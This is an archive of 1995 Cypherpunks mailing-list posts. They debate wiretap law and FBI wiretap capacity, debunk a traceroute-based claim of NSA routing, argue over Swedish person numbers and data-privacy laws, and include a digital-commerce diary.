In-Reply-To: <v02120d02acc1d4859dfc@[192.0.2.1]>
Message-ID: <Pine.SOL.3.91.951105003800.21655A-100000@use.usit.net>




On Sat, 4 Nov 1995, Lucky Green wrote:

> At 18:43 11/3/95, Rich Graves wrote:
> >[about the FBI supposedly wanting the ability to tap 1% of all phones in
> >the US simultaneously]
> 
> [...]
> >Of course the FBI doesn't have the staff to listen to all these lines, and
> >they need an individual court order to authorize each individual
> >interception, so this numbers game is a bit of a joke.
> 
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year. The Digital Telephony Bill, which passed Congress by an overwhelming
> margin, _explicitly_ allows for wiretap authorizations other than a court
> order. The law does not impose any rules for these "other forms of
> authorization".
> 
> "The captain signed it off" may suffice.


And Clinton issued an executive order allowing Janet Reno (or her 
designees, I believe) to approve wiretaps.

bd


> 
> 
> -- Lucky Green <mailto:shamrock at netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 





From nobody at REPLAY.COM  Sat Nov  4 22:27:17 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 5 Nov 1995 14:27:17 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511050620.HAA14046@utopia.hacktic.nl>


I'm sure some of you will have seen this, so sorry to toss logs on the
listburn fire; still, it seemed worth reposting to CP--no, it's not
entirely crypto-related, but nor is it a completely vague allegation.

>From GovAccess.183.snoops:

>  The following is the transcript of an actual communications trace that a
>  friend ran, while I was sitting next to him, watching -- reprinted here
>  with his permission.
>  
>  He did a "traceroute" of two messages that he sent from his machine in
>  Switzerland (he'd telneted into it while we were at a computer conference
>  in California).
>  
>  Traceroute automatically reports each Internet node through which a message
>  passes, as it proceeds from origin to destination.
>  
>  He did two traceroutes.  The first was from Switzerland to an addressee at
>  Netcom in San Jose, California.  The second was from Switzerland to an
>  addressee in Israel.
>  
>  
>  Date: Fri, 21 Apr 95 02:54:58 +0200
>  From: kelvin at fourmilab.ch (John Walker)
>  To: jwarren at well.com
>  Subject: Traceroute
>  
>  > /usr2/kelvin> traceroute netcom11.netcom.com
>  traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40
byte packets
>   1  eunet-router (193.8.230.64)  2 ms  2 ms  2 ms
>   2  146.228.231.1 (146.228.231.1)  326 ms  345 ms  307 ms
>   3  Bern5.CH.EU.NET (146.228.14.5)  447 ms  408 ms  364 ms
>   4  146.228.107.1 (146.228.107.1)  127 ms  37 ms  36 ms
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
>   6   (134.222.9.1)  65 ms  109 ms  252 ms
>   7  lp (134.222.35.2)  196 ms  179 ms  405 ms
>   8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
>   9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
>  10  t3-2.dc-gw4-2.netcom.net (163.179.220.181)  182 ms  251 ms  187 ms
>  11  t3-2.chw-il-gw1.netcom.net (163.179.220.186)  305 ms  586 ms  518 ms
>  12  t3-2.scl-gw1.netcom.net (163.179.220.190)  537 ms  693 ms  797 ms
>  13  t3-1.netcomgw.netcom.net (163.179.220.193)  698 ms  549 ms  754 ms
>  14  netcom11.netcom.com (192.100.81.121)  890 ms  1922 ms  1696 ms
>  
>  > /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
>  traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
>  byte packets
>   1  eunet-router (193.8.230.64)  2 ms  3 ms  2 ms
>   2  146.228.231.1 (146.228.231.1)  933 ms  853 ms  874 ms
>   3  Bern5.CH.EU.NET (146.228.14.5)  1040 ms  450 ms  525 ms
>   4  146.228.107.1 (146.228.107.1)  453 ms  424 ms  188 ms
>   5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
>   6   (134.222.9.1)  80 ms  312 ms  84 ms
>   7  lp (134.222.35.2)  270 ms  400 ms  216 ms
>   8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
>   9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
>  10  orion.datasrv.co.il (192.114.20.22)  1756 ms  1280 ms  1309 ms
>  11  ...
>  
>  
>  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
>  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
>  I.e., the second message went through Virginia to get from Switzerland to
>  Israel.
>  
>  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
>  report, ``No match for "134.222.9.1". '' and `` No match for
>  "134.222.35.2".''
>  
>  Now let me see ... which spy agencies are located in or near Virginia?
>  
>  --jim





From unicorn at polaris.mindport.net  Sat Nov  4 22:37:56 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sun, 5 Nov 1995 14:37:56 +0800
Subject: [NOISE, if interesting NOISE] Assassins
Message-ID: <Pine.SUN.3.91.951105012822.9937A-100000@polaris.mindport.net>



Interested parties might want to discuss the effectiveness of murder in 
politics with the world's most recent assassin.

Or at least leave interesting mail to the security forces who will likely 
be running through his e-mail.

Here's your chance to make your life REAL interesting, and test PGP, just 
send some encrypted mail to our friend and gunman Mr. Amir at:

la59 at popeye.cc.biu.ac.il


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From ses at tipper.oit.unc.edu  Sat Nov  4 22:53:07 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 14:53:07 +0800
Subject: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951104223658.7174A-100000@chivalry>


On Sun, 5 Nov 1995, Anonymous wrote:

> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
> >  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
> >  I.e., the second message went through Virginia to get from Switzerland to
> >  Israel.
> >  
> >  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
> >  report, ``No match for "134.222.9.1". '' and `` No match for
> >  "134.222.35.2".''

Yes, you've finally cottoned on to the secret NSA routing trick to 
cleverly tap all traffic. Really clever the way they use two hosts in the 
132.222 Class B network. Strange that traffic from EUNET should be using 
that network, especially since it happens to be listed in the whois 
database as being NET-EUNET-X25.

::chivalry:ses$ whois -h rs.internic.net 134.222
::European Unix Users Group (NET-EUNET-X25)
::   Kruislaan 413
::   NL-1098 SJ Amsterdam
::   NETHERLANDS






From hua at xenon.chromatic.com  Sat Nov  4 23:02:13 1995
From: hua at xenon.chromatic.com (Ernest Hua)
Date: Sun, 5 Nov 1995 15:02:13 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511050653.WAA17662@xenon.chromatic.com>


You don't really need a special (and clearly suspicious) IP address to
perform driftnet fishing.  All you need is to be sure that all physical
packets pass through a checkpoint charlie and just park a sniffer there
to watch everything fly by.

On the other hand, it would be interesting to see how hard NSA pushes
behind the scenes to have physical long distance cables run through the
US routers/switches (in the name of US national security, of course).

It would be fun (perhaps horrible) to see what the NSA does the first
time Isreal or France set up their own high capacity long distance to
other friendly/unfriendly countries (thus bypassing the US completely).
Second, let France or some other country set up major Internet routing
clearinghouses which advertise secure routes to other nations (not US).

Ern





From reh at wam.umd.edu  Sat Nov  4 23:05:10 1995
From: reh at wam.umd.edu (Richard Huddleston)
Date: Sun, 5 Nov 1995 15:05:10 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511050655.BAA18760@exp1.wam.umd.edu>


134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
(instead of the individual IP addresses) you find:

European Unix Users Group (NET-EUNET-X25)
   Kruislaan 413
   NL-1098 SJ Amsterdam
   NETHERLANDS

   Netname: EUNET-X25
   Netnumber: 134.222.0.0

   Coordinator:
      EUnet Ltd  (EU-NIC)  hostmaster at nic.eu.net
      +31 20 5925109
      +31 20 5925165 (24hr Emergency)
      +31 20 5925163 (fax)

   Domain System inverse mapping provided by:

   NS.EU.NET			192.16.202.11
   SUNIC.SUNET.SE		192.36.125.2 192.36.148.18
   NS.UU.NET			137.39.1.3
   NS2.NIC.FR			192.93.0.4

   Record last updated on 07-Mar-94.

...what does this do to your traceroute dumps?

Richard






From somogyi at digmedia.com  Sat Nov  4 23:10:38 1995
From: somogyi at digmedia.com (Stephan Somogyi)
Date: Sun, 5 Nov 1995 15:10:38 +0800
Subject: lp (134.222.35.2)?
Message-ID: <v03003901acc20da1f22f@[198.93.25.98]>


At 7:20 5.11.95, Anonymous wrote:

> it seemed worth reposting to CP--no, it's not entirely crypto-related,
> but nor is it a completely vague allegation.
[...]
> From GovAccess.183.snoops:
[...]
>>  Notice that both messages went through an unnamed site -- 134.222.9.1 and
>>  then a strangely-named site, "lp (134.222.35.2)" -- then through the same
>>  Vienna, Virginia (USA) site ... and thereafter, on to their destination.
>>  I.e., the second message went through Virginia to get from Switzerland to
>>  Israel.
>>
>>  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
>>  report, ``No match for "134.222.9.1". '' and `` No match for
>>  "134.222.35.2".''
>>
>>  Now let me see ... which spy agencies are located in or near Virginia?

Oh please.

The probable reason that the InterNIC doesn't know about the
132.222.0.0 networks is because they're in Europe. If you search for
either of the network numbers of the IP addresses mentioned above in
the RIPE database <http://www.ripe.net/>, you will find that they
belong to the EUnet backbone.

After pinging 134.222.9.1 successfully, I telnetted to it and it
claimed, quite plausibly, that it's a device (presumably a router) in
Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
fills me with no dread whatsoever.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media







From anonymous-remailer at shell.portal.com  Sat Nov  4 23:29:40 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 5 Nov 1995 15:29:40 +0800
Subject: Sun speaks out - but not to the cypherpunks
Message-ID: <199511050721.XAA14000@jobe.shell.portal.com>


I know that it is rude to follow up one of your own posts, and I apologize
in advance for this horrible faux-pas, but hopefully, it's excused this
one time.  I wrote: 

>One example of this that should serve as a useful case study is a recent
>problem which was brought to the Canadian public's attention just this
>week, on a program called the Fifth Estate.  The CBC (Canadian
>Broadcasting Corporation) detailed a software code problem in one of
>AECL's (Atomic Energy of Canada Limited's) instruments which deliver
>penetrating radiation. 
>
>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose 100
>times what was prescribed.  This software "bug" literally killed wherever
>the machine was in use. 

Does anyone on this list know if the CBC has a web site on the Net?

I'm hoping that someone (hint, hint) who has a convenient website, one
with lots of spare bandwidth could volunteer to contact the CBC and
persuade them to copyright clear the Fifth Estate program clip which
documented some of the risks of software bugs in mission critical
applications, and allow it to be placed on the Net.  I'm hoping that this
English language piece reaches a wide international audience. 

The Canadian Broadcasting Corporation is a Crown Corporation which has
historically received its primary funding from the Government of Canada. 
Recently, it has suffered under the budgetary ax, and the push for
privatization.  I'm pretty confident that the Corporation would copyright
clear the clip for MPEG distribution across the Net, if they were
approached with the concept that the clip was a demonstration of the CBC's
journalistic excellence and integrity, a piece which is demonstrative of
the critical need to continue their funding.  A concrete demonstration of
the need for the CBC.  And a piece which could well receive deserved
international acclaim. 

The site would help them, and would simultaneously be a site of
international public service. 

Nothing will drive home the need for quality software, quality code, and
quality security more than the vivid graphic pictures of the consequences
of sloppy code, or of the risks if certain critical systems, LANs, or
private networks are compromised, or if security and privacy (which are
flip sides of the same coin) are ignored. 

The sight of a body, that has had a hole burned straight through it from
the front through to the spine is truly chilling and drives the message
home.  Nothing seems to speak as clearly as a picture ... as to what the
stakes are ... of what "bugs" in code do ... and of what a network
compromise can leave in its wake. 

A picture of consequences.

Six people died in Canada and the United States due to the software flaw. 
Even after numerous reports of the flaws, the company refused to even
acknowledge the existence of a problem, and in fact did everything within
its power to make sure doctors, radiologists and physicists were unaware. 

The attitude of trivialization can only be characterized as fantastic, and
would be unbelievable to anyone who has not viewed the piece. 

It's one hell of a backgrounder which not only details problems, but looks
at solutions -- it examines attitudes, especially management attitudes.  It
truly deserves an expanded audience.  From teachers, to students, to the
international media, to the concerned private individual, all will be
served well if this piece gets wide attention. 

Takers, anyone??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From carolann at censored.org  Sun Nov  5 00:22:53 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Sun, 5 Nov 1995 16:22:53 +0800
Subject: My Sympathies to you at this time.
Message-ID: <199511050813.BAA08529@usr2.primenet.com>


To those of you from Israel or who are Jewish,
my deepest sympathies to all of you.

Love Always,

Carol Anne

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/








From tcmay at got.net  Sun Nov  5 00:24:59 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 16:24:59 +0800
Subject: Credentials Without Identity
Message-ID: <acc1ae3828021004292e@[205.199.118.202]>


I do not intend my comments below to be disrespectful to the people of Sweden.

At 4:32 AM 11/5/95, Mats Bergstrom wrote:

>Ah, the Swedish way is so much more convenient. Directly after birth you
>get a tag around your arm, with a number that is later changed to an
>entry into several databases, including 'Birth Registry' and you get
>your Person Number for life, in the format YYMMDD-abcd, which is
>unique (at least in Sweden). All forthcoming database entries are based
>on this number, usually as a first key field. Surprise immigrants get a

The Swedish way may be more convenient, but the Nazi way was even more
convenient. The Person Numbers (or NonPerson Numbers, I suppose) were
tattooed directly on the arms.

For many of us, the essence of strong crypto, crypto anarchy, and the
Cypherpunks list is to avoid this "Swedish future." Truly a blight on
mankind, if you ask me.

The U.S is moving swiftly in this direction. (Ironically, the foreign press
clucks at our "fascism" with Proposition 187-type measures, while there own
countries are far more restrictive in allowing immigration.)

Fortunately, I have heard there is a "right wing" backlash growing in some
of the Scandinavian countries, especially Norway and Denmark. ("Right wing"
is what the press calls it...I hope it's really "anti-left wing,"
anti-cradle-to-grave-socialism.)


>other person). Most Government databases are open to the public, so
>the credit tracking agencies don't have to work very hard regarding

The worst of both worlds: the government mandates that information be
collected at every turn, then opens the records for all to see.

>Now, there are laws against cross-referencing various databases
>without the approval of the Data Inspection, which often says no.

To my surprise, several people on this list have expressed support for the
need for so-called "data privacy laws." I look at it this way: if I put
things on my computer based on things I have learned, or even compile lists
of people and places, etc., who can enter my home and demand that I expunge
these records? The problem with well-intentioned laws about data privacy is
that they impinge directly on the freedom to read and write, to make lists,
to enter thoughts into computers, etc. (I'm sure the _intent_ is to go
after MasterCard-type operations and inaccurate records, but businesses in
Britain are already facing investigation for having computerized mailing
lists. Ironically, the Cypherpunks mailing list might be illegal in the
U.K. unless the legal forms were properly filled out, the fees paid, the
parties notified on a regular basis of information about them, etc. And our
archiving of posts is ipso facto illegal under several interpretations of
the Data Privacy laws of some countries unless extensive notifications are
made and permissions received. The Data Privacy laws make us all criminals
for storing received messages in data bases.)

More practically, giving a government the power to say which data bases are
acceptable, and which data bases are illegal, is a terrible thing. Besides
the opportunities for abuse (by a Stalin, a Nixon, a Pol Pot, a Clinton),
it is also an impractical law to enforce, as Mats' next point makes:

>But if you do it illegaly, there is very little risk of detection.
>It looks like the Approved ID will be a smart-card with a signing
>mechanism (probably escrowed), naturally linked to the Person Number,
>real soon now, at least before the mythical y.2000 . Links to physical
>characteristics (retina?) are not (openly) discussed yet but may
>eventually come into play.
...

And:

>2) Prepare for Crypto Anarchy. Create untrackable net aliases for
>   future use. Keep informed of all the tricks to bypass coming
>   futile attempts to link net pseudonyms to Person Numbers (or
>   physical characteristics). Enjoy (and help create and protect)
>   the virtual sanctuary with digital mixes and anonymous http
>   proxies (and DC-nets or something better eventually).

Sad, isn't it, that the world is rushing headlong into an Orwellian future.
"Disneyland with a death penalty" ("Wired"--S. Sandfort, W. Gibson).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From pat at falcon.inetw.net  Sun Nov  5 00:53:19 1995
From: pat at falcon.inetw.net (Pat Billings)
Date: Sun, 5 Nov 1995 16:53:19 +0800
Subject: My Sympathies to you at this time.
In-Reply-To: <199511050813.BAA08529@usr2.primenet.com>
Message-ID: <Pine.3.89.9511050329.A11923-0100000@falcon.inetw.net>


We are *all* stunned at this senseless loss....even those of us who do 
not live in Israel or are not Jewish.....   This is a great loss.

Love,

SuprSmile

On Sun, 5 Nov 1995, Censored Girls Anonymous wrote:

> To those of you from Israel or who are Jewish,
> my deepest sympathies to all of you.
> 
> Love Always,
> 
> Carol Anne
> 
> --
> 
> Member Internet Society  - Certified BETSI Programmer  -  Webmistress
> ***********************************************************************
> Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
> My Homepage
> The Cyberdoc
> ***********************************************************************
> ------------------ PGP.ZIP Part [017/713] -------------------
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
> MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 
> 





From hallam at w3.org  Sun Nov  5 01:00:10 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sun, 5 Nov 1995 17:00:10 +0800
Subject: Keyed-MD5, and HTTP-NG
In-Reply-To: <9510018152.AA815258328@snail.rsa.com>
Message-ID: <9511020101.AA05060@zorch.w3.org>


On 11/1/95 10:20 AM, perry at piermont.com worte:

> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he 
> would have), and I wasn't called, either. We were the only two 
> editors of that portion of the specification.

This appears to have been a problem from both ends. A number of
people arround here only heard about the IPsec work when it had
reached the final call phase.

There also seems to be a move towards looking at the question of
how protocol and cryptography interacts as a field in it own right.

I think this highlights one of the problems with the IETF we need a 
much broader infrastructure for understanding what progress other 
groups have made. The time when we can expect to do everything through 
email alone is past. I wish I could persuade more people in the IETF
that the Web infrastructure could provide a valuable assistance
as a collaboration tool for their needs. Unfortunately the approach seems
to be that because there are is a person living at the end of a 2400
baud modem in vermont who cannot configure his PPP we should all continue
in the stone age. 

We could improve readability of RFCs through using HTML and reduce
the flamage on mailing lists through collaboration tools like the
open meeting. But we don't because it hasn't been done that way in the
past.

I would like to see a collaboration system where I can present an expert
with the context of a proposal very rapidly without expecting them to
read the archives of an entire mailing list.


	Phill





From s1113645 at tesla.cc.uottawa.ca  Sun Nov  5 02:23:05 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sun, 5 Nov 1995 18:23:05 +0800
Subject: [noise, personal reply] CBC address.
In-Reply-To: <199511050721.XAA14000@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511050521.A29690-0100000@tesla.cc.uottawa.ca>



On Sat, 4 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> Does anyone on this list know if the CBC has a web site on the Net?
<www.cbc.ca>  They have a lot of shows in .au (so I hear) or accessible by 
realaudio. Don't know if they have any mpigs [sic] though. There's an alt 
newsgroup too.
You oughta use Sameer's (or someone else's) replyable remailer when asking 
questions Alice.







From edge at got.net  Sun Nov  5 03:10:40 1995
From: edge at got.net (Jay Campbell)
Date: Sun, 5 Nov 1995 19:10:40 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511041320.FAA12812@you.got.net>


>It is a well-known fact that it was common practice for NSA operatives to
>                                                        ^^^
>masquerade as Injuns in the 1800's and waylay Pony Express riders in order 
>                            ^^^^^^
>I think you'll find the NSA was not in existence in the 1800's.

I'm disappointed at the sheer number of similar pieces of email I received
on this. You'da thought the Capn Crunch reference was silly enough that
people would give me a funny look and trash the original message.
--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From shields at tembel.org  Sun Nov  5 03:17:23 1995
From: shields at tembel.org (Michael Shields)
Date: Sun, 5 Nov 1995 19:17:23 +0800
Subject: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <47i5na$24d@yage.tembel.org>


In article <199511050620.HAA14046 at utopia.hacktic.nl>,
Anonymous <nobody at REPLAY.COM> wrote:
> I'm sure some of you will have seen this, so sorry to toss logs on the
> listburn fire; still, it seemed worth reposting to CP--no, it's not
> entirely crypto-related, but nor is it a completely vague allegation.

It's specious.

> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)"

Belonging to the EUnet backbone, apparently run by people who don't care
much about DNS.

Actually, I resolve 134.222.9.1 as `Amsterdam4.NL.EU.net'.  I can ping
it, but not 134.222.35.2.  134.222.35/24 also does not appear in the
RIPE registry.  I'm going to conclude that it was a temporary thing EUnet
set up for some reason.  It seems to have been replaced by amsterdam6,
134.222.228.13.

> > -- then through the same
> >  Vienna, Virginia (USA) site ...

...a major router at a major interconnect run by UUNET, a major provider.
datasrv appaently contracted with UUNET for traffic.  Naturally it would
go through their network, which is centered in the US.

Why isn't the NSA tapping biu.ac.il, a central Israeli news site?
Routing from Net99 to them is through IBM.

> >  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
> >  report, ``No match for "134.222.9.1". '' and `` No match for
> >  "134.222.35.2".''

They are not comprehensive.  You need to look up the network.

This is silly.  If the NSA were monitoring traffic with the consent of
EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they
wouldn't need to play these routing games; they'd just eavesdrop at an
interconnect or on the leased lines leading into it, run a rough filter
over it to cut down volume, and tunnel the traffic home through other
channels (probably satellite).  And if they were monitoring without the
consent of UUNET and EUnet, they still wouldn't play these games because
the providers would be upset about the unexpected load on the expensive
and overloaded transatlantic pipes.

Finally, we all know how easy sniffing is at the local (LAN, ISP LAN,
and especially telco) level.  And we know that end-to-end encryption
is the way to go.  So what would we have learned if we knew the NSA
was eavesdropping?

Just *assume* the NSA is out to get you, design systems that resist
attack, and then you can stop caring about whether you're the target.

And tell your vendor you want Kerberos or IPSEC.
-- 
Shields.





From futplex at pseudonym.com  Sun Nov  5 04:06:04 1995
From: futplex at pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 20:06:04 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com>
Message-ID: <199511030019.TAA19297@opine.cs.umass.edu>


Today's (11/2) NYT carries a Markoff story on The 1% Solution at the top 
left of the front page. The article mentions that the DT appropriation has 
been cut out of the current budget bill (last week ?). It points out that 
since the White House officially plans to veto the current bill anyway, 
they're unlikely to waste too much effort on sticking things into it.

Supposedly they want three zones of wiretap capability: (roughly) 1% in 
cities, 0.5% in suburbs, 0.25% in the country.

We've discussed the grave concern that digital equipment makes everything
much easier to handle. I would like to know what sort of technological 
assurances we could possibly obtain that the arbitrary 1%/0.5%/0.25% figures
couldn't trivially be bumped up to, say, 10%/5%/2.5% with a little bit of
programming. Is this a legitimate worry ?  If the FBI gets its way on this,
how far will we be from the day when 1% is merely a parameter in a wiretap
control program ?  

I don't know enough about telephone switches etc. (digital or otherwise) to
know whether this is just idle speculation.

-Futplex <futplex at pseudonym.com>





From rah at shipwright.com  Sun Nov  5 04:08:23 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Sun, 5 Nov 1995 20:08:23 +0800
Subject: e$: 24 Hours
Message-ID: <v02120d00acbedcdd34fe@[199.0.65.105]>


-----BEGIN PGP SIGNED MESSAGE-----

e$: 24 Hours

Yesterday, I had probably the most amazing day I've had in a very
long time. As the day revolved around e$, strong crypto, cryptoanarchy,
Macs and the life on the internet, I thought I would share it with you.

6:00
     Got up before the alarm. Carol, my wife, dropped me off at the gym,
     where I hadn't set foot in about 6 months. Started up yet another
     new exercise program. Did a lot of big muscle stuff, like squats
     and deadlifts -- now I can't climb stairs so well for a while. Shaved
     off yet another unfinished goatee (3rd time in 6 weeks) because I
     had to be presentable in public today.

9:30
     Showed up at the speaker's desk at Infoworld Boston, got
     credentialled and went to find David Fox's session on transaction
     methods. Had some time before, so I ran down to the floor and
     weaseled an Apple Internet guy named Tom Bartlett into shooting a
     picture of me with a QuickTake so that Vinnie Moscaritolo, another
     friend at Apple, wouldn't have a picture of him holding a scrawled
     sign saying "Bob: send me a GIF for this!" on the e$ web-page he's
     building for me at http://www.webstuff.apple.com/~vinnie/Rah/ . I
     had Tom e-mail the GIF to me from the floor, and ran back to
     the session, with 5 minutes to spare.

     The session got about 300 attendees, who listened to presentations
     from Pierre from First Virtual, Cliff from Open Market and Mike
     from Checkfree, and then I got to talk a bit.

     I had never spoken to a convention before, and here I was batting
     cleanup after all the pros pitched their stuff. David Fox introduced
     me as a "Wild Card", and I did my best to help him out. We were running
     late, but after asking them to get up and stretch after sitting
     through 2 hours of dog-and-pony, I asked the audience how many
     people people were from Boston, and told them about The Boston
     Society for Digital Commerce and when the meeting was. I then asked
     them how many of them had ever sold a car, and then asked them whether
     they took MasterCard from the buyer, and got a nice laugh.

     I told them that I thought that digital commerce *was* financial
     cryptography, and that most people settling trades on the net were
     just figuring that out. I told them to go out and buy Applied
     Cryptography by Schneier, and Out of Control by Kelley. I told them
     about the difference between certificate-based and book-entry
     transaction systems. I told them about Tim May's idea of
     Crypto-Anarchy, and about the Cypherpunks.

     Finally I asked them to imagine a world where instead of needing to
     enforce copyrights and patents, a developer's code would simply
     refuse to run periodically without a digital receipt saying that
     some specified amount had been paid, to the developer, preferrably
     in cash. I told them about Digicash, Mark Twain Bank, and about
     how important that was, even if it was a bumpy first start.

     At question-and-answer time, a guy from Germany asked us about the
     ITARs, regulatory restrictions on international transactions, and
     deutchmark-denominated business. All of the other presenters allowed
     that while that was hard, they had patches or were working on it, and
     that regulations were a problem. I talked about Eric Hughes' idea
     of regulatory arbitrage, how John Gilmore said that the internet saw
     censorship, and by extension arbitrary regulation, as damage, and
     routed around it, and I said that the folks at Mark Twain and
     Digicash had seen this as a problem and set up their system to be
     denominated in one of 5 currencies, including marks.

     I picked up about 10 cards from people who wanted to come to lunch at
     the Boston Society for Digital Commerce. (Plug: The first Tuesday of
     the month at the downtown Harvard Club. This month's speaker is Win Treese
     from Open Market, on how to design systems for digital commerce. E-mail
     me for details.)

     In addition, I saw BSDC member Dave Lash, a real-estate mogul turned
     web-fanatic who told me how to clean up my presentation style for next
     time.

2:00
     After schmoozing, and trying to find a bank to cash a check. I met
     David Fox and his web guy (forgot your name, sorry) on the trade
     floor in front of the Netscape booth, which was about 20% the size
     of the IBM booth, and was blocking the aisles so much that the fire
     marshall was giving them grief for it.

     We then went to see Jim Phillips at Security First Network Bank.
     SFNB is in Atlanta, and while the likes of Citicorp and Chase were
     putting together proprietary, dial-up, bank-by-phone systems, Jim
     went ahead and did his stuff on the web for some rediculous fraction
     of their costs. They were the only bank there. They had this tiny
     booth way back in the corner, and they were also a fire marshall
     problem. Jim was talking to a guy from California somewhere about
     setting up an account right then and there.

     I told Jim to expect a visit from my anonymous digital signature
     law source "Irwin" , (for Irwin Cory, The World's Foremost
     Authority, RIP), who had asked me earlier in the week about SFNB,
     and how to get ahold of them.

     Then, David, who was the original Aldus and Radius distributor in
     Australia before moving here a few years ago, went around lining up
     sponsors for his WWW pre-tradeshow tradeshow which in turn evolved
     out of his tradeshow directory business.

     While we walked around, I talked to David some more about e$pam, my
     idea for building a group of three e$-mail lists (a filtered list of
     other e$-ralated sources, an unmoderated "watering hole", and a
     newsletter), and we agreed to talk more about it on Friday sometime.

3:00 Cashed a check from my first-ever writing sale, a longish rant
     entitled "The Geodesic Network, OpenDoc, and CyberDog", which
     originally was posted to apple-internet-users, was cross-posted by
     bunches of other people in the Mac world to other e-mail lists all
     over the place, got me fan mail from the likes of Kawasaki, Alsop,
     Petreley, and various Apple Vice Presidents, and was even cited in a
     New Zealand law journal. An editor from InfoWorld bashed it from
     a 20kb rant down to a feature article of about 1300 words, and it
     will appear this Monday in the November 6th issue.

4:00 Went to see a client, who is the CFO for a famous, er, beauty salon,
     with about 50 salons world wide. I sort of core-dumped at him about
     how someday he could send his e-mail his cash to the home office in
     London every night. He's seen me like this before, so he didn't
     quite think I was from Mars...

5:45 As a lurker on the internet-marketing list, I got invited to a
     party at Bob Metcalfe's 5-story Back Bay townhouse. I had recruited
